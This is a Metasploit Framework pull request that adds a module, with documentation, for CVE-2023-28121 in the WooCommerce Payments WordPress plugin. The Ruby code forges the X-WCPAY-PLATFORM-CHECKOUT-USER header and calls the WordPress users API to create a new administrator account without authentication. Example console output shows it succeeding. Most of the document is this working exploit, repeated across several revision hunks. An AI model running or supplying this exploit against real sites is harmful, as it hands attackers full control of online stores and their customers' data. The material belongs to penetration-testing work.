### PR TITLE
WooCommerce Payments auth bypass and priv esc

### DIFF
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -57,3 +57,4 @@ woocommerce-abandoned-cart
 elementor
 bookingpress
 paid-memberships-pro
+woocommerce-payments

--- a/documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
@@ -1,0 +1,63 @@
+## Vulnerable Application
+
+WooCommerce-Payments plugin for Wordpress contains an authentication bypass by specifing a valid user ID number
+within the `X-WCPAY-PLATFORM-CHECKOUT-USER` header.  With this authentication bypass, a user can then use the API
+to create a new user with administartive privileges IF the user ID selected was also an administrator.
+
+### Install
+
+Download, install, and Activate [woocomerce-payments](https://downloads.wordpress.org/plugin/woocommerce-payments.5.6.1.zip)
+
+No configuration is required, and WooCommerce itself is not required.
+
+## Verification Steps
+
+1. Install the plugin
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/wp_woocommerce_payments_add_user`
+1. Do: `set username [username]`
+1. Do: `set rhosts [ip]`
+1. Do: `run`
+1. You should get a new administrator created and the credentials.
+
+## Options
+
+### USERNAME
+
+The username to create. Default is `msfadmin`.
+
+### PASSWORD
+
+The password for the user. Default is to create a random one.
+
+### EMAIL
+
+The email address for the user. Default is to create a random one.
+
+### ADMINID
+
+The user ID number for an administrator. Defaults to `1`
+
+## Scenarios
+
+### VWooCommerce Payments 5.6.1 on Wordpress 6.2.2
+
+```
+msf6 > use auxiliary/scanner/http/wp_woocommerce_payments_add_user 
+msf6 auxiliary(scanner/http/wp_woocommerce_add_user) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(scanner/http/wp_woocommerce_add_user) > set username h00die
+username => h00die
+msf6 auxiliary(scanner/http/wp_woocommerce_add_user) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/http/wp_woocommerce_add_user) > exploit
+[*] Running module against 1.1.1.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/woocommerce-payments/readme.txt
+[*] Found version 5.6.1 in the plugin
+[+] The target appears to be vulnerable.
+[*] Attempting to create administrator -> h00die:lWqD3BOer3AFZ (willie.miller@iwuxphff.qiawqio9t.gov)
+[+] User was created successfully
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
@@ -44,13 +44,13 @@ The user ID number for an administrator. Defaults to `1`
 
 ```
 msf6 > use auxiliary/scanner/http/wp_woocommerce_payments_add_user 
-msf6 auxiliary(scanner/http/wp_woocommerce_add_user) > set rhosts 1.1.1.1
+msf6 auxiliary(scanner/http/wp_woocommerce_payments_add_user) > set rhosts 1.1.1.1
 rhosts => 1.1.1.1
-msf6 auxiliary(scanner/http/wp_woocommerce_add_user) > set username h00die
+msf6 auxiliary(scanner/http/wp_woocommerce_payments_add_user) > set username h00die
 username => h00die
-msf6 auxiliary(scanner/http/wp_woocommerce_add_user) > set verbose true
+msf6 auxiliary(scanner/http/wp_woocommerce_payments_add_user) > set verbose true
 verbose => true
-msf6 auxiliary(scanner/http/wp_woocommerce_add_user) > exploit
+msf6 auxiliary(scanner/http/wp_woocommerce_payments_add_user) > exploit
 [*] Running module against 1.1.1.1
 
 [*] Running automatic check ("set AutoCheck false" to disable)

--- a/documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
@@ -39,7 +39,7 @@ The email address for the user. Default is to create a random one.
 
 ### ADMINID
 
-The user ID number for an WordPress administrator. Defaults to `1`.
+The user ID number for a WordPress administrator. Defaults to `1`.
 
 ## Scenarios
 

--- a/documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
@@ -8,7 +8,7 @@ selected corresponds to an administrator account.
 
 ### Install
 
-Download, install, and Activate [woocomerce-payments 5.6.1](https://downloads.wordpress.org/plugin/woocommerce-payments.5.6.1.zip)
+Download, install, and activate [woocomerce-payments 5.6.1](https://downloads.wordpress.org/plugin/woocommerce-payments.5.6.1.zip)
 
 No configuration is required, and one does not need to install the main WooCommerce platform itself.
 
@@ -39,7 +39,7 @@ The email address for the user. Default is to create a random one.
 
 ### ADMINID
 
-The user ID number for an administrator. Defaults to `1`
+The user ID number for an WordPress administrator. Defaults to `1`.
 
 ## Scenarios
 

--- a/documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
@@ -1,14 +1,16 @@
 ## Vulnerable Application
-
-WooCommerce-Payments plugin for Wordpress contains an authentication bypass by specifing a valid user ID number
-within the `X-WCPAY-PLATFORM-CHECKOUT-USER` header.  With this authentication bypass, a user can then use the API
-to create a new user with administartive privileges IF the user ID selected was also an administrator.
+WooCommerce-Payments plugin for Wordpress versions 4.8 prior to 4.8.2, 4.9 prior to 4.9.1,
+5.0 prior to 5.0.4, 5.1 prior to 5.1.3, 5.2 prior to 5.2.2, 5.3 prior to 5.3.1, 5.4 prior to 5.4.1,
+5.5 prior to 5.5.2, and 5.6 prior to 5.6.2 contain an authentication bypass by specifying a valid user ID number
+within the `X-WCPAY-PLATFORM-CHECKOUT-USER` header. With this authentication bypass, a user can then use the API
+to create a new user with administrative privileges on the target WordPress site IF the user ID
+selected corresponds to an administrator account.
 
 ### Install
 
-Download, install, and Activate [woocomerce-payments](https://downloads.wordpress.org/plugin/woocommerce-payments.5.6.1.zip)
+Download, install, and Activate [woocomerce-payments 5.6.1](https://downloads.wordpress.org/plugin/woocommerce-payments.5.6.1.zip)
 
-No configuration is required, and WooCommerce itself is not required.
+No configuration is required, and one does not need to install the main WooCommerce platform itself.
 
 ## Verification Steps
 
@@ -18,7 +20,8 @@ No configuration is required, and WooCommerce itself is not required.
 1. Do: `set username [username]`
 1. Do: `set rhosts [ip]`
 1. Do: `run`
-1. You should get a new administrator created and the credentials.
+1. A new WordPress administrator account should be created.
+1. Verify the new account uses the username and password specified in the USERNAME and PASSWORD datastore options respectively.
 
 ## Options
 
@@ -57,7 +60,7 @@ msf6 auxiliary(scanner/http/wp_woocommerce_payments_add_user) > exploit
 [*] Checking /wp-content/plugins/woocommerce-payments/readme.txt
 [*] Found version 5.6.1 in the plugin
 [+] The target appears to be vulnerable.
-[*] Attempting to create administrator -> h00die:lWqD3BOer3AFZ (willie.miller@iwuxphff.qiawqio9t.gov)
+[*] Attempting to create an administrator user -> h00die:lWqD3BOer3AFZ (willie.miller@iwuxphff.qiawqio9t.gov)
 [+] User was created successfully
 [*] Auxiliary module execution completed
 ```

--- a/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
+++ b/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress Plugin WooCommerce Payments Unauthenticated Admin Creation',
+        'Description' => %q{
+          WooCommerce-Payments plugin for Wordpress contains an authentication bypass by specifing a valid user ID number
+          within the `X-WCPAY-PLATFORM-CHECKOUT-USER` header.  With this authentication bypass, a user can then use the API
+          to create a new user with administartive privileges IF the user ID selected was also an administrator.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Michael Mazzolini', # original discovery
+          'Julien Ahrens' # detailed writeup
+        ],
+        'References' => [
+          [ 'URL', 'https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/'],
+          [ 'URL', 'https://developer.woocommerce.com/2023/03/23/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know/'],
+          [ 'CVE', '2023-28121']
+        ],
+        'DisclosureDate' => '2023-03-22',
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [ true, 'User to create', '']),
+        OptString.new('PASSWORD', [ false, 'Password to create, random if blank', '']),
+        OptString.new('EMAIL', [ false, 'Email to create, random if blank', '']),
+        OptInt.new('ADMINID', [ false, 'ID Number of an administrative user', 1]),
+        OptString.new('TARGETURI', [ true, 'The URI of the Wordpress instance', '/'])
+      ]
+    )
+  end
+
+  def check
+    unless wordpress_and_online?
+      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
+    end
+
+    checkcode = check_plugin_version_from_readme('woocommerce-payments', '5.6.2')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      return Msf::Exploit::CheckCode::Safe('WooCommerce-Payments version not vulnerable')
+    end
+
+    checkcode
+  end
+
+  def run
+    if datastore['PASSWORD'].blank?
+      password = Rex::Text.rand_text_alphanumeric(10..15)
+    else
+      password = datastore['PASSWORD']
+    end
+    if datastore['EMAIL'].blank?
+      email = Rex::Text.rand_mail_address
+    else
+      email = datastore['EMAIL']
+    end
+    print_status("Attempting to create administrator -> #{datastore['USERNAME']}:#{password} (#{email})")
+    [nil, 'index.php'].each do |url_root| # try through both '' and 'index.php' since API can be in 2 diff places based on install/rewrites
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, url_root, 'wp-json', 'wp', 'v2', 'users'),
+        'headers' => { "X-WCPAY-PLATFORM-CHECKOUT-USER": datastore['ADMINID'] },
+        'method' => 'POST',
+        'ctype' => 'application/json',
+        'data' => {
+          'username' => datastore['USERNAME'],
+          'email' => email,
+          'password' => password,
+          'roles' => ['administrator']
+        }.to_json
+      })
+      fail_with(Failure::Unreachable, 'Connection failed') unless res
+      next if res.code == 404
+
+      if res.code == 201
+        print_good('User was created successfully')
+        if framework.db.active
+          create_credential_and_login({
+            address: rhost,
+            port: rport,
+            protocol: 'tcp',
+            workspace_id: myworkspace_id,
+            origin_type: :service,
+            service_name: 'Wordpress',
+            private_type: :password,
+            module_fullname: fullname,
+            access_level: 'administrator',
+            status: Metasploit::Model::Login::Status::SUCCESSFUL
+          })
+        end
+      else
+        print_error("Server response: #{res.body}")
+      end
+      break # we didn't get a 404 so we can bail on the 2nd attempt
+    end
+  end
+
+end

--- a/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
+++ b/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('USERNAME', [true, 'User to create', '']),
         OptString.new('PASSWORD', [false, 'Password to create, random if blank', '']),
         OptString.new('EMAIL', [false, 'Email to create, random if blank', '']),
-        OptInt.new('ADMINID', [false, 'ID Number of an administrative user', 1]),
+        OptInt.new('ADMINID', [false, 'ID Number of a WordPress administrative user', 1]),
         OptString.new('TARGETURI', [true, 'The URI of the Wordpress instance', '/'])
       ]
     )

--- a/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
+++ b/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
@@ -25,9 +25,9 @@ class MetasploitModule < Msf::Auxiliary
           'Julien Ahrens' # detailed writeup
         ],
         'References' => [
-          [ 'URL', 'https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/'],
-          [ 'URL', 'https://developer.woocommerce.com/2023/03/23/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know/'],
-          [ 'CVE', '2023-28121']
+          ['URL', 'https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/'],
+          ['URL', 'https://developer.woocommerce.com/2023/03/23/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know/'],
+          ['CVE', '2023-28121']
         ],
         'DisclosureDate' => '2023-03-22',
         'Notes' => {
@@ -40,11 +40,11 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(80),
-        OptString.new('USERNAME', [ true, 'User to create', '']),
-        OptString.new('PASSWORD', [ false, 'Password to create, random if blank', '']),
-        OptString.new('EMAIL', [ false, 'Email to create, random if blank', '']),
-        OptInt.new('ADMINID', [ false, 'ID Number of an administrative user', 1]),
-        OptString.new('TARGETURI', [ true, 'The URI of the Wordpress instance', '/'])
+        OptString.new('USERNAME', [true, 'User to create', '']),
+        OptString.new('PASSWORD', [false, 'Password to create, random if blank', '']),
+        OptString.new('EMAIL', [false, 'Email to create, random if blank', '']),
+        OptInt.new('ADMINID', [false, 'ID Number of an administrative user', 1]),
+        OptString.new('TARGETURI', [true, 'The URI of the Wordpress instance', '/'])
       ]
     )
   end
@@ -63,16 +63,16 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
+    password = datastore['PASSWORD']
     if datastore['PASSWORD'].blank?
       password = Rex::Text.rand_text_alphanumeric(10..15)
-    else
-      password = datastore['PASSWORD']
     end
+
+    email = datastore['EMAIL']
     if datastore['EMAIL'].blank?
       email = Rex::Text.rand_mail_address
-    else
-      email = datastore['EMAIL']
     end
+
     print_status("Attempting to create administrator -> #{datastore['USERNAME']}:#{password} (#{email})")
     [nil, 'index.php'].each do |url_root| # try through both '' and 'index.php' since API can be in 2 diff places based on install/rewrites
       res = send_request_cgi({
@@ -112,5 +112,4 @@ class MetasploitModule < Msf::Auxiliary
       break # we didn't get a 404 so we can bail on the 2nd attempt
     end
   end
-
 end

--- a/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
+++ b/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
@@ -14,9 +14,12 @@ class MetasploitModule < Msf::Auxiliary
         info,
         'Name' => 'Wordpress Plugin WooCommerce Payments Unauthenticated Admin Creation',
         'Description' => %q{
-          WooCommerce-Payments plugin for Wordpress contains an authentication bypass by specifing a valid user ID number
-          within the `X-WCPAY-PLATFORM-CHECKOUT-USER` header.  With this authentication bypass, a user can then use the API
-          to create a new user with administartive privileges IF the user ID selected was also an administrator.
+          WooCommerce-Payments plugin for Wordpress versions 4.8 prior to 4.8.2, 4.9 prior to 4.9.1,
+          5.0 prior to 5.0.4, 5.1 prior to 5.1.3, 5.2 prior to 5.2.2, 5.3 prior to 5.3.1, 5.4 prior to 5.4.1,
+          5.5 prior to 5.5.2, and 5.6 prior to 5.6.2 contain an authentication bypass by specifying a valid user ID number
+          within the X-WCPAY-PLATFORM-CHECKOUT-USER header. With this authentication bypass, a user can then use the API
+          to create a new user with administrative privileges on the target WordPress site IF the user ID
+          selected corresponds to an administrator account.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -73,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary
       email = Rex::Text.rand_mail_address
     end
 
-    print_status("Attempting to create administrator -> #{datastore['USERNAME']}:#{password} (#{email})")
+    print_status("Attempting to create an administrator user -> #{datastore['USERNAME']}:#{password} (#{email})")
     [nil, 'index.php'].each do |url_root| # try through both '' and 'index.php' since API can be in 2 diff places based on install/rewrites
       res = send_request_cgi({
         'uri' => normalize_uri(target_uri.path, url_root, 'wp-json', 'wp', 'v2', 'users'),
@@ -99,7 +102,7 @@ class MetasploitModule < Msf::Auxiliary
             protocol: 'tcp',
             workspace_id: myworkspace_id,
             origin_type: :service,
-            service_name: 'Wordpress',
+            service_name: 'WordPress',
             private_type: :password,
             module_fullname: fullname,
             access_level: 'administrator',

--- a/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
+++ b/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
@@ -31,9 +31,9 @@ class MetasploitModule < Msf::Auxiliary
         ],
         'DisclosureDate' => '2023-03-22',
         'Notes' => {
-          'Stability' => [],
+          'Stability' => [CRASH_SAFE],
           'Reliability' => [],
-          'SideEffects' => []
+          'SideEffects' => [IOC_IN_LOGS]
         }
       )
     )

--- a/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
+++ b/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
@@ -108,9 +108,12 @@ class MetasploitModule < Msf::Auxiliary
             workspace_id: myworkspace_id,
             origin_type: :service,
             service_name: 'WordPress',
+            username: username,
             private_type: :password,
+            private_data: password,
             module_fullname: fullname,
             access_level: 'administrator',
+            last_attempted_at: DateTime.now,
             status: Metasploit::Model::Login::Status::SUCCESSFUL
           })
         end


### PR DESCRIPTION
fixes #18159

This PR adds a module to exploit an auth bypass and priv esc to create a new user on a wordpress instance which is running WooCommerce Payments < 5.6.1.  Pretty simple, add a header to execute the bypass, then we just use the API to create a new user.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Install the plugin
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/scanner/http/wp_woocommerce_payments_add_user`
- [ ] Do: `set username [username]`
- [ ] Do: `set rhosts [ip]`
- [ ] Do: `run`
- [ ] You should get a new administrator created and the credentials.
